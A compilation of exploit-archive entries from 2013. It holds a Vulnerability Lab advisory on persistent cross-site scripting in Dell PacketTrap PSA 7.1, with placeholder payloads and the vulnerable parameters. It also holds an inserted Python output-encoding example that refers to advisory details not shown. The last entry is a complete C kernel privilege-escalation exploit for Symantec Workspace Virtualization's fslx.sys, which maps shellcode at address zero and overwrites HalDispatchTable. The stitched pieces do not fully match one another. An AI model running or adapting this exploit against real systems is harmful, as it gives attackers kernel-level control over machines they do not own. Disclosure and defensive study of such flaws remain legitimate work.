The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Source: Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities
-
Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities

Title:
======
Dell PacketTrap PSA 7.1 - Multiple Persistent Vulnerabilities

Date:
=====
2013-07-18

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=790

VL-ID:
=====
790

Common Vulnerability Scoring System:
====================================
5.6

Introduction:
=============
Purpose built for IT professionals and other service businesses. Streamline the management of projects, clients, staff, assets, and billing. Software should be intuitive and easy-to-use, not complicated and confusing. That's why packetTrap has created an easy to use yet powerful interface that even your techs enjoy using. Whether you are using spreadsheets and sticky notes or clunky software, companies like yours will surely benefit from the significant time savings and a dramatic increase in profitability. With packetTrap PSA, you now have an integrated solution that delivers an end-to-end business management solution with real advantages over other options. Service Request Tracking - Team Scheduling - Customer and Contact Management - Customer Portal - Mobile Friendly - QuickBooks Integration Equipment Tracking Contract Management - Email Dropbox - SSL Security.

(Copy of the Vendor Homepage: http://www.packettrap.com/ )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the DELL packetTrap PSA v7.1 web application.
Report-Timeline:
================
2013-01-24: Researcher Notification & Coordination (Ibrahim Mosaad El-Sayed)
2013-02-06: Vendor Notification (Dell Security Team)
2013-02-08: Vendor Response/Feedback (Dell Security Team)
2013-**-**: Vendor Fix/Patch (Developer Team)
2013-07-18: Public Disclosure (Vulnerability Laboratory)

Status:
========
Published

Affected Products:
==================
DELL
Product: PacketTrap PSA 7.1

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities are detected in the DELL packetTrap PSA v7.1 web application. The bug allows remote attackers to implement/inject own malicious script code on the application side of the system (persistent). Exploitation of persistent issues mostly requires a low privilege application user account and a user interaction click or input.

The 1st persistent web vulnerability is located in the contracts module when processing to request a via POST method manipulated txtContractName parameter. The vulnerability allows remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the contract module when processing to display (list) the context (output). The result is the persistent execution of script code in the contract overview listing.

The 2nd persistent web vulnerability is located in the Equipment Item module when processing to request a via POST method manipulated lblPurchaseInfo parameter. The vulnerability allows remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Equipment Item module when processing to display (list) the context (output). The result is the persistent execution of script code in the Equipment Item listing.
The 3rd persistent web vulnerability is located in the Import Customer Equipment Records module when processing to request a via POST method manipulated gridItem parameter. The vulnerability allows remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Import Customer Equipment Records module when processing to display (list) the context (output). The result is the persistent execution of script code in the Import Customer Equipment Records listing.

The 4th part of the persistent web vulnerabilities are located in the Labor Rate module when processing to request via POST method manipulated lblItemNo, lblDescription, lblAccountName & lblNotes parameters. The vulnerabilities allow remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Labor Rate module when processing to display (list) the context (output). The result is the persistent execution of script code in the Labor Rate listing.

The 5th part of the persistent web vulnerabilities are located in the Materials Item module when processing to request via POST method manipulated lblMfrName, lblMfrItemNo, lblMfrDescription, lblAccountName & lblNotes parameters. The vulnerabilities allow remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Materials Item module when processing to display (list) the context (output). The result is the persistent execution of script code in the Materials Item listing.

The 6th part of the persistent web vulnerabilities are located in the New customer module when processing to request via POST method manipulated lblPrimaryContact & lblPrimaryLocation parameters. The vulnerabilities allow remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the New customer module when processing to display (list) the context (output). The result is the persistent execution of script code in the New customer listing.

The 7th persistent web vulnerability is located in the Report module when processing to request a via POST method manipulated lblPageTitle parameter. The vulnerability allows remote attackers to inject own malicious script code with persistent vector in a vulnerable value which is also in use by the Report module when processing to display (list) the context (output). The result is the persistent execution of script code in the Report overview listing.

Exploitation of the vulnerability requires a low privilege web-application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking (manager/admin) with persistent vector, persistent phishing, persistent external redirects to malware, exploits or scripts and persistent manipulation of module context.
Vulnerable Module(s):
[+] Contract - PacketTrap PSA
[+] Equipment Item - PacketTrap PSA
[+] Import Customer Equipment Records - PacketTrap PSA
[+] Labor Rate - PacketTrap PSA
[+] Materials Item - PacketTrap PSA
[+] New customer - PacketTrap PSA
[+] Report x ApplicationName - PacketTrap PSA

Vulnerable Parameter(s):
[+] txtContractName
[+] lblPurchaseInfo
[+] gridItem
[+] lblItemNo, lblDescription, lblAccountName & lblNotes
[+] lblMfrName, lblMfrItemNo, lblMfrDescription, lblAccountName & lblNotes
[+] lblPrimaryContact & lblPrimaryLocation
[+] lblPageTitle

Affected Section(s):
[+] Contract Overview & Edit - Listing
[+] Equipment Item Overview & Edit - Listing
[+] Import Customer Equipment Records Overview - Listing
[+] Labor Rate Details - Listing
[+] Materials Item Overview - Listing
[+] New customer Account Details - Listing
[+] Report - Listing

Proof of Concept:
=================
The persistent script code inject vulnerabilities can be exploited by low privileged group user accounts with low required user interaction. For demonstration or reproduce ...

Review: Contract Overview & Edit - Listing

<div class="objectHead">
<h1>Contract: <span id="lblPageTitle">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></h1>
<h2><a href="https://vl.packettrappsa.com/customers/customer.aspx?customerId=33628564"><span id="lblCustomerName">Sample Customer</span></a></h2>
</div>
...
&
<td style="width:130px;" class="formLabel">Contract Name:</td>
<td style="width:auto;">
<span id="txtContractName">"><[PERSISTENT INJECTED SCRIPT CODE!]></span>
</td>
</tr>

Review: Equipment Item Overview & Edit - Listing

<td class="formLabel"> Purchase Info.: </td>
<td>
<span id="lblPurchaseInfo">Purchased on Dec 11, 2012 from "><[PERSISTENT INJECTED SCRIPT CODE!]></span>
</td>
</tr>

Review: Import Customer Equipment Records Overview - Listing

</tr><tr class="gridItem" valign="top">
<td><!--?php</td-->
</td></tr><tr class="gridItem" valign="top">
<td>phpinfo();</td>
O_O
</tr><tr class="gridItem" valign="top">
<td>?></td>
</tr><tr class="gridItem" valign="top">
<td>><[PERSISTENT INJECTED SCRIPT CODE!](</td">
</tr>
</table>

Review: Labor Rate Details - Listing

<td class="formLabel"> Name/No.:</td>
<td>
<span id="lblItemNo">"><[PERSISTENT INJECTED SCRIPT CODE!]></span>
</td>
</tr>
<tr>
<td class="formLabel">Description:</td>
<td>
<span id="lblDescription">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td>
</tr>
...
&
<td class="formLabel">Account Name:</td>
<td>
<span id="lblAccountName">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td>
</tr>

Review: Materials Item Overview - Listing

<span id="lblItemNo">"><[PERSISTENT INJECTED SCRIPT CODE!]">
</td>
</tr>
<tr>
<td class="formLabel"> Description:</td>
<td>
<span id="lblDescription">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td>
</tr>
...
&
<table border="0" cellpadding="4" cellspacing="0" width="100%">
<tbody><tr>
<td colspan="2"> <hr></td>
</tr>
<tr>
<td style="width:130px;" class="formLabel">Manufacturer:</td>
<td style="width:auto;">
<span id="lblMfrName">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td>
</tr>
<tr><td class="formLabel">Mfr. Item No.:</td>
<td>
<span id="lblMfrItemNo">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td>
</tr>
<tr><td class="formLabel">Mfr. Item Desc.:</td>
<td>
<span id="lblMfrDescription">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td>
</tr>
...
&
<tr><td class="formLabel">Account Name:</td>
<td>
<span id="lblAccountName">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td>
</tr>
<tr>
<td colspan="2"> <hr></td>
</tr>
<tr>
<td class="formLabel">Id:</td>
<td>
<span id="lblItemId">33583304</span></td>
</tr>
<tr>
<td class="formLabel">Created:</td>
<td>
<span id="lblCreated">by the storm on Dec 9, 2012 at 5:11 PM</span></td>
</tr>
<tr>
<td colspan="2"> <hr></td>
</tr>
<tr>
<td class="formLabel">Notes:</td>
<td>
<span id="lblNotes">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></td>
</tr>

Review: New customer Account Details - Listing

<tbody><tr>
<td style="width: 130px;">
<strong>Primary Contact:</strong>
</td>
<td style="width: auto;">
<span id="lblPrimaryContact"><a href="https://vl.packettrappsa.com/customers/contact.aspx?customerId=33628565& contactId=33637457">"><iframe src=http://www. "><iframe src=http://www.</a>, () -, <a href="mailto:"><[PERSISTENT INJECTED SCRIPT CODE!]>">"><[PERSISTENT INJECTED SCRIPT CODE!]></a></span>
</td>
</tr>
<tr>
<td>
<strong>Primary Location:</strong>
</td>
<td>
<span id="lblPrimaryLocation"><a href="https://vl.packettrappsa.com/customers/location.aspx?customerId=33628565& locationID=33649992">"><[PERSISTENT INJECTED SCRIPT CODE!]</a>, "><[PERSISTENT INJECTED SCRIPT CODE!]> (<a href="https://vl.packettrappsa.com/tools/getMap.aspx?customerLocationId=33649992" class="map-link">Get Map</a>)</span>
</td>
</tr>
</tbody>

Review: Report - Listing

<div class="ReportHeader">
<h1><span id="lblPageTitle">"><[PERSISTENT INJECTED SCRIPT CODE!]></span></h1>
</div>
<div class="ReportBody">
<input name="TempSortCol" id="TempSortCol" type="hidden">
<input name="TempSortOrder" id="TempSortOrder" type="hidden">
<div id="ReportParameters" class="ReportParameters2">
<div id="StandardFilters_ReportParameters">
<div class="ParameterGroupHead">
<span class="ui-corner-tr">Time Frame</span>
</div>

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as high(-).
Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [ibrahim@evolution-sec.com]
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri [bkm@evolution-sec.com]

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]

--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Source: Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities
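Both PacketTrap advisories above come down to the same defect: values that a low-privileged user stores (gadget_name, txtContractName, lblPageTitle and the rest) are written back into HTML without output encoding, so the stored value can close its span and open new markup. The following is an added example and is not part of either advisory or of the PacketTrap products (the field ids are the advisories'; the record values, the function names and the audit heuristic are constructed here). It places the verbatim-copy pattern next to its encoded form and adds a check that reports whether a stored value crossed its markup boundary, which is the question a defender asks when reviewing the listings the advisories name.

```python
# Added example (not Dell/PacketTrap code): output encoding for the stored
# fields the two advisories name, plus a check that flags a rendered
# fragment in which a stored value has escaped its <span>.
import html
import re
from typing import Dict, List

# Field ids come from the advisories; the values are constructed here.
# The <em> marker is harmless and only shows whether the boundary held.
CONSTRUCTED_RECORD: Dict[str, str] = {
    "lblPageTitle": 'Quarterly report "><em>marker</em>',
    "txtContractName": "Support '><em>marker</em>",
    "lblPurchaseInfo": "Purchased on Dec 11, 2012 from ACME & Sons",
    "HostName": "HOSTBUSTER",
}


def render_label_unsafe(field_id: str, value: str) -> str:
    """The pattern the advisories describe: stored value copied verbatim."""
    return f'<span id="{field_id}">{value}</span>'


def render_label(field_id: str, value: str) -> str:
    """Hardened form: encode for element content and for attribute context.

    The RMM report listing also placed the host name into a title="..."
    attribute, so the same value is emitted in both contexts here.
    html.escape(quote=True) rewrites & < > " and ' to entities.
    """
    safe = html.escape(value, quote=True)
    return f'<span id="{field_id}" title="{safe}">{safe}</span>'


# A tag other than the wrapping span means the value broke out of its context.
_TAG_RE = re.compile(r"</?\s*([A-Za-z][A-Za-z0-9]*)")


def foreign_tags(fragment: str) -> List[str]:
    """Tag names in a rendered fragment other than the expected <span> wrapper."""
    return [t for t in _TAG_RE.findall(fragment) if t.lower() != "span"]


def suspicious_fields(record: Dict[str, str]) -> List[str]:
    """Audit helper for already-stored data: field ids whose value carries
    markup metacharacters. A legitimate value such as "ACME & Sons" does not
    trip it, but one with quotes or angle brackets does; treat the result as
    a review queue, not a verdict."""
    return sorted(f for f, v in record.items() if re.search(r'[<>"\']', v))


def render_record(record: Dict[str, str], safe: bool = True) -> str:
    """Render every field of a record, one span per line."""
    renderer = render_label if safe else render_label_unsafe
    return "\n".join(renderer(f, v) for f, v in record.items())


if __name__ == "__main__":
    unsafe = render_record(CONSTRUCTED_RECORD, safe=False)
    print(unsafe)
    print("foreign tags (unsafe):", foreign_tags(unsafe))
    hardened = render_record(CONSTRUCTED_RECORD)
    print(hardened)
    print("foreign tags (encoded):", foreign_tags(hardened))
    print("fields to review:", suspicious_fields(CONSTRUCTED_RECORD))
```

The check is deliberately structural rather than signature-based: it does not look for any particular payload, only for the appearance of tags the template never emitted, which is what the "[PERSISTENT INJECTED SCRIPT CODE!]" placeholders in the review snippets stand for.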
-
Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation

# Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit
# Date: 2013-7-17
# Author : MJ0011
# Version: Symantec Workspace Virtualization 6.4.1895.0
# Tested on: Windows XP SP3

DETAILS:
In fslx.sys's hook function of "NtQueryValueKey", it directly writes to the buffer of "ResultLength" without any check.

EXPLOIT CODE:

#include "stdafx.h"
#include "windows.h"

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;
typedef const UNICODE_STRING *PCUNICODE_STRING;

typedef LONG (WINAPI *pNtQueryValueKey)(
    HANDLE KeyHandle,
    PUNICODE_STRING ValueName,
    ULONG KeyValueInformationClass,
    PVOID KeyValueInformation,
    ULONG Length,
    PULONG ResultLength
);

typedef LONG (WINAPI *pNtQueryIntervalProfile)(
    ULONG ProfileSource,
    PULONG Interval
);

typedef LONG (WINAPI *pZwQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

#include "malloc.h"

PVOID GetInfoTable(ULONG ATableType)
{
    ULONG mSize = 0x4000;
    PVOID mPtr = NULL;
    LONG status;
    HMODULE hlib = GetModuleHandle("ntdll.dll");
    pZwQuerySystemInformation ZwQuerySystemInformation =
        (pZwQuerySystemInformation)GetProcAddress(hlib, "ZwQuerySystemInformation");

    do {
        mPtr = malloc(mSize);
        if (mPtr) {
            status = ZwQuerySystemInformation(ATableType, mPtr, mSize, 0);
        } else {
            return NULL;
        }
        if (status == 0xc0000004) {
            free(mPtr);
            mSize = mSize * 2;
        }
    } while (status == 0xc0000004);

    if (status == 0) {
        return mPtr;
    }
    free(mPtr);
    return NULL;
}

enum {
    SystemModuleInformation = 11,
    SystemHandleInformation = 16
};

typedef struct {
    ULONG  Unknown1;
    ULONG  Unknown2;
    PVOID  Base;
    ULONG  Size;
    ULONG  Flags;
    USHORT Index;
    USHORT NameLength;
    USHORT LoadCount;
    USHORT PathLength;
    CHAR   ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {
    ULONG Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(ULONG x1, ULONG y1, ULONG x2, ULONG y2, ULONG color);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(ULONG Color);
typedef VOID (*INBV_DISPLAY_STRING_FILTER)(PUCHAR *Str);
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(INBV_DISPLAY_STRING_FILTER DisplayStringFilter);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(BOOLEAN bEnable);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(ULONG x1, ULONG y1, ULONG x2, ULONG y2);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(PUCHAR Str);

PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0;
PINBV_RESET_DISPLAY InbvResetDisplay = 0;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0;
PINBV_DISPLAY_STRING InbvDisplayString = 0;

#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15

UCHAR DisplayString[] =
    " "
    " "
    " "
    " ---- ===== EXPLOIT SUCCESSFULLY ==== ---- "
    " "
    " "
    " Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit"
    " "
    " VULNERABLE PRODUCT "
    " "
    " Symantec Workspace Virtualization "
    " "
    " "
    " VULERABLE FILE "
    " fslx.sys <= 6.4.1895.0 "
    " "
    " AUTHOR "
    " "
    " MJ0011 "
    " th_decoder@126.com "
    " "
    " 2013-7-17 "
    " Symantec's technology is hundreds of years behind that of us "
    " "
    " "
    "";

VOID InbvShellCode()
{
    // DISABLE INTERRUPT
    __asm { cli }

    // RESET TO VGA MODE
    InbvAcquireDisplayOwnership();
    InbvResetDisplay();

    // FILL FULL SCREEN
    InbvSolidColorFill(0, 0, 639, 479, VGA_COLOR_BLACK);

    // SET TEXT COLOR
    InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
    InbvInstallDisplayStringFilter(NULL);
    InbvEnableDisplayString(TRUE);
    InbvSetScrollRegion(0, 0, 639, 477);
    InbvDisplayString(DisplayString);

    while (TRUE) {
    };
}

BOOL InbvInit(PVOID ntosbase, PSTR ntosname)
{
    HMODULE hlib = LoadLibrary(ntosname);
    if (hlib == NULL) {
        return FALSE;
    }
    InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib, "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
    InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib, "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
    InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib, "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
    InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib, "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
    InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib, "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
    InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib, "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
    InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib, "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
    InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib, "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);

    if (InbvAcquireDisplayOwnership && InbvResetDisplay && InbvSolidColorFill && InbvSetTextColor &&
        InbvInstallDisplayStringFilter && InbvEnableDisplayString && InbvSetScrollRegion && InbvDisplayString) {
        return TRUE;
    }
    return FALSE;
}

typedef LONG (WINAPI *PNT_ALLOCATE_VIRTUAL_MEMORY)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
);

#define ProfileTotalIssues 2

int main(int argc, char* argv[])
{
    printf("Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n"
           "fslx.sys <= 6.4.1895.0\n"
           "\nBy MJ0011\n2013-7-17\nth_decoder@126.com\nPRESS ENTER\n");
    getchar();

    PSYSTEM_MODULE_INFORMATION pinfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
    if (pinfo == 0) {
        printf("cannot get system info\n");
        return 0;
    }

    if (!InbvInit(pinfo->Module[0].Base, strrchr(pinfo->Module[0].ImageName, '\\') + 1)) {
        printf("cannot init inbv system!\n");
        return 0;
    }

    pNtQueryValueKey NtQueryValueKey = (pNtQueryValueKey)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryValueKey");

    // alloc shellcode jump
    PNT_ALLOCATE_VIRTUAL_MEMORY NTAllocateVM = (PNT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
    PVOID BaseAddress = (PVOID)0x1;
    ULONG dwsize = 0x1000;
    LONG status;
    status = NTAllocateVM(GetCurrentProcess(), &BaseAddress, 0, &dwsize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (status != 0) {
        printf("err alloc vm %08x\n", status);
        getchar();
        return 0;
    }

    // result length always <=0x800
    // 0~0x800: NOP
    // 0x800: shell code
    memset((PVOID)0x0, 0x90, 0x1000);
    *(BYTE*)((ULONG)0x800) = 0xe9;
    *(ULONG*)((ULONG)0x801) = (ULONG)InbvShellCode - (ULONG)0x800 - 0x5;

    // get haldispatchtable
    HMODULE hntos = LoadLibrary(strrchr(pinfo->Module[0].ImageName, '\\') + 1);
    if (hntos == 0) {
        printf("cannot load ntos\n");
        getchar();
        return 0;
    }
    PVOID pHalDispatchTable = GetProcAddress(hntos, "HalDispatchTable");
    pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);
    pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pinfo->Module[0].Base);
    PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable + sizeof(ULONG));
    FreeLibrary(hntos);

    HKEY hkey;
    ULONG err = RegOpenKeyEx(HKEY_CURRENT_USER, "Software", 0, KEY_READ, &hkey);
    if (err != ERROR_SUCCESS) {
        printf("open key read failed %u\n", err);
        getchar();
        return 0;
    }
    HKEY hkey2;
    err = RegOpenKeyEx(HKEY_CURRENT_USER, "Software", 0, KEY_WRITE, &hkey2);
    if (err != ERROR_SUCCESS) {
        printf("open key write failed %u\n", err);
        getchar();
        return 0;
    }
    DWORD dd;
    err = RegSetValueEx(hkey2, "123", 0, REG_DWORD, (CONST BYTE*)&dd, sizeof(DWORD));
    if (err != ERROR_SUCCESS) {
        printf("set value %u\n", err);
        getchar();
        return 0;
    }

    BYTE buffer[100];
    PVOID pbuf = buffer;
    UNICODE_STRING name;
    name.Buffer = NULL;
    name.Length = 0;
    name.MaximumLength = 0;
    status = NtQueryValueKey(hkey, &name, 2, pbuf, 100, (PULONG)xHalQuerySystemInformationAddr);

    // fire our shell code
    pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
    NtQueryIntervalProfile(ProfileTotalIssues, 0);
    return 0;
}

Source: Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation